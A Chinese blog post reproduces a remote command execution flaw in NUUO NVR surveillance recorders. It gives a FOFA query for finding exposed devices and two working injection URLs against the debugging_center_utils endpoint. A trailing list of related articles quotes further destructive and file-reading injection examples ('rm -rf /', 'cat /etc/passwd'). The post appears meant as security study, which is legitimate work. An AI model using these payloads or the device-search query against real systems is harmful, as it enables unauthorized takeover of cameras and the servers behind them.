【漏洞复现】NUUO摄像头远程命令执行漏洞

最新推荐文章于 2025-03-26 00:34:18 发布
最新推荐文章于 2025-03-26 00:34:18 发布
阅读量775 收藏 5
点赞数 17
分类专栏: 漏洞复现 文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46381222/article/details/143356344
版权

免责声明

请勿使用本文中提到的技术进行非法测试或行为。使用本文中提供的信息或工具所造成的任何后果和损失由使用者自行承担,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、简介

NUUO NVR是一款用于监控和视频管理的设备,通常与IP摄像头配合使用。它能够实时录制、存储和管理来自多个摄像头的视频流。NUUO NVR支持多种视频编码格式,并提供了丰富的功能,如运动检测、事件触发、远程访问、云存储等。

二、漏洞描述

NUUO NVR摄像头在debugging_center_utils接口处存在远程命令执行,攻击者可通过该漏洞在服务器上执行任意命令,获取服务器权限。

三、fofa语法

title="Network Video Recorder Login"

四、漏洞复现

/__debugging_center_utils___.php?log=|id
/__debugging_center_utils___.php?log=;whoami

在这里插入图片描述
在这里插入图片描述
批量检测(批量检测POC工具请前往知识星球获取):

最低0.47元/天 解锁文章
NUUO摄像机 远程命令执行漏洞复现(附脚本)(CVE-2025-1338)
iSee857的博客
02-19 792
漏洞存在于服务器端脚本文件/handle_config.php的print_file功能模块中,具体由未经验证的log参数引发命令注入风险。攻击者通过构造恶意HTTP请求,在log参数中注入操作系统命令(如"; cat /etc/passwd"或"| rm -rf /"等特殊字符组合),当后端使用system()、exec()等危险函数处理该参数时,可导致注入的命令被服务器执行。由于未实施有效的输入过滤和参数化处理机制,攻击者无需身份认证即可远程发起攻击,实现任意命令执行、敏感文件读取、系统权限提升等恶意
智能AC管理系统HTTPD-AC 1.0服务存在未授权访问漏洞
nnn2188185的博客
09-19 218
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发智能AC管理系统HTTPD-AC 1.0服务。
NUUO 网络摄像头命令执行漏洞
weixin_45971758的博客
02-06 2004
NUUO是中国台湾省NUUO公司旗下的一款网络视频记录器,该设备存在远程命令执行漏洞,攻击者可利用该漏洞执行任意命令,进而获取服务器的权限。网络视频记录器的CPU为Marvell Kirkwood 88F6281,CPU架构为基于ARMv5架构。该系统中有busybox,一个精简的环境,包含了许多最常用的UNIX命令和工具,如ls、cp、mv、grep、find、awk、sed等。无法执行复杂的任务和其他架构的程序。
NUUO 摄像头(弱口令登录漏洞)
最新发布
qq_65379983的博客
03-26 381
弱口令登录
NUUO摄像头远程命令执行漏洞复现 [附POC]
薛定谔嘚喵博客
10-26 868
NUUO Network Video Recorder(NVR)是中国台湾NUUO公司的一款网络视频记录器。NUUO NVR视频存储管理设备__debugging_center_utils___.php存在未授权远程命令执行漏洞,攻击者可在没有任何权限的情况下通过log参数执行任意PHP代码,从而入侵服务器,获取服务器的管理员权限。
NUUO摄像头 debugging_center_utils 远程命令执行漏洞复现
iSee857的博客
10-30 382
‌是由中国台湾NUUO公司生产的一款网络视频录像机(Network Video Recorder,简称NVR),广泛应用于零售、交通、教育、政府和银行等多个领域。它能够同时管理多个IP摄像头,实现视频录制、存储、回放及远程监控等功能,采用先进的视频处理技术,提供高清、流畅的视频画面,满足各种复杂环境下的监控需求‌。NUUO NVR摄像头在debugging_center_utils接口处存在远程命令执行,攻击者可通过该漏洞在服务器上执行任意命令,获取服务器权限。厂商已发布补丁 请即时修复。
海康摄像头CVE-2021-36260漏洞复现
A_991128a的博客
04-25 2666
攻击者利用该漏洞可以用无限制的 root shell 来完全控制设备,即使设备的所有者受限于有限的受保护 shell(psh)。除了入侵 IP摄像头外,还可以访问和攻击内部网络。该漏洞的利用并不需要用户交互,攻击者只需要访问 http 或 HTTPS服务器端口(80/443)即可利用该漏洞,无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。
漏洞复现NUUO摄像头存在远程命令执行漏洞
失心少年
11-17 820
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!NUUO摄像头是中国台湾NUUO公司旗下的一款网络视频记录器,该设备存在远程命令执行漏洞,攻击者可利用该漏洞执行任意命令,进而获取服务器的权限。漏洞链接:http://127.0.0.1/
漏洞复现】Hikvision摄像头产品代码执行漏洞(CVE-2021-36260)
晚风不及你
01-20 5875
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。Hikvision的网络摄像头产品线非常丰富,涵盖了各种型号和功能,以满足不同用户的需求。
NUUO网络摄像头(NVR)RCE漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-03 988
NUUO Network Video Recorder(NVR)是中国台湾NUUO公司的一款网络视频记录器。NUUO NVR视频存储管理设备的__debugging_center_utils___.php文件存在未授权远程命令执行漏洞,攻击者可在没有任何权限的情况下通过log参数执行任意命令。没有人规定,一朵花一定要成长为向日葵或者玫瑰。
CVE-2017-7921 海康威视(Hikvision) 摄像头漏洞复现
菜鸟学渗透
05-22 1万+
这是一个海康威视摄像头后台管理未授权漏洞,通过构造URL可绕过登录查看监控,检索所有用户和配置文件下载,并获取到监控后台管理账号和密码。
Goby漏洞更新 | NUUO NVR 摄像机 __debugging_center_utils___.php 命令执行漏洞(CVE-2016-5674)
m0_46699477的博客
04-07 575
(CVE-2016-5674) NUUO Network Video Recorder(NVR)是中国台湾NUUO公司的一款网络视频记录器。NUUO NVR视频存储管理设备__debugging_center_utils___.php存在未授权远程命令执行漏洞,攻击者可在没有任何权限的情况下通过log参数执行任意PHP代码,从而入侵服务器,获取服务器的管理员权限。
针对常见网络摄像头漏洞扫描工具
潇湘信安的博客
09-16 3352
主要针对网络摄像头漏洞扫描框架,目前已集成海康、大华、宇视、dlink等常见设备。Windows 仍有部分bug,Linux 与 Mac可以正常使用。请确保安装了3.7及以上版本的Python,推荐3.8
海康威视越权访问CVE-2021-7921漏洞复现
热门推荐
归零者的博客
10-31 1万+
海康威视越权访问CVE-2021-7921漏洞复现
AVTECH IP摄像头漏洞已存在多年但未修复 被纳入僵尸网络
smellycat000的专栏
08-31 571
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Akamai 公司的研究员 Kyle Lefton、Larry Cashdollar 和AVTECH Aline Eliovich 表示,AVTECH 公司的闭路电视 (CCTV) 摄像头中存在已有多年历史的一个高危命令注入漏洞 (CVE-2024-7029),可导致远程代码执行 (RCE) 后果。该漏洞的CVSS评分为8.7。CISA在本月早些...
海康威视(Hikvision) 摄像头-CVE-2017-7921漏洞复现
m0_49025459的博客
07-04 8420
许多HikvisionIP摄像机包含一个后门,允许未经身份验证的模拟任何配置的用户帐户。
NUUO摄像头存在命令执行漏洞
ZeroDay001的博客
11-14 295
NUUO是一家专注于智能监控解决方案的公司,提供从CCTV到IP摄像机的全面产品线,包括PC和Linux嵌入式服务器,适用于各种规模的安装需求。其产品线主要包括Crystal™系列和MainConsole系列,提供全面的监控解决方案。
海康威视 CVE-2017-7921 漏洞复现
q857857ytt的博客
11-30 1289
直接在输入框里搜:HiKvision Digital Technology Co该api接口可以未授权访问,获取监控的快照 (打码了,啥都看不到是正常的)下载摄像头配置账号密码文件访问该路由之后浏览器会自动下载一个名为configurationFile的文件,如下4.从网上下载解密二进制文件直接download下载、解压将 configurationFile 文件替换成刚刚下载的运行命令账号和密码就解密出来了让你下载插件,这里用360或者搜狗浏览器开兼容模式就可以访问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值